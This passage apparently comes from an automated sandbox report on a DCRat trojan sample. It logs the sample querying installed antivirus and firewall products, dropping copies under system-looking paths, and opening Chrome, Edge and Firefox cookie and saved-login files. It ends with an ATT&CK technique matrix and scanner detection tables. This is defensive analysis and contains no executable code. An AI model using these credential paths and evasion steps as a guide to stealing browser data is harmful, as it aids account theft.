                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F1DF1E
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0B146 GetVersionExW,0_2_00F0B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168, type: MEMORYSTR
                                    Source: Yara matchFile source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies

                                    Remote Access Functionality

                                    Source: Yara match, File source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168, type: MEMORYSTR
                                    Source: Yara match, File source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara match, File source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts141
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    11
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution
                                    1
                                    DLL Side-Loading
                                    11
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    2
                                    Non-Application Layer Protocol
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter
                                    Logon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information
                                    Security Account Manager167
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    12
                                    Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                    Software Packing
                                    NTDS361
                                    Security Software Discovery
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets1
                                    Process Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts123
                                    Masquerading
                                    Cached Domain Credentials261
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                                    Virtualization/Sandbox Evasion
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection
                                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Behavior Graph: ID: 1581724, Sample: ZZ2sTsJFrt.exe, Startdate: 28/12/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
ZZ2sTsJFrt.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
ZZ2sTsJFrt.exe | 53% | Virustotal |
ZZ2sTsJFrt.exe | 100% | Avira | VBS/Runner.VPG
ZZ2sTsJFrt.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
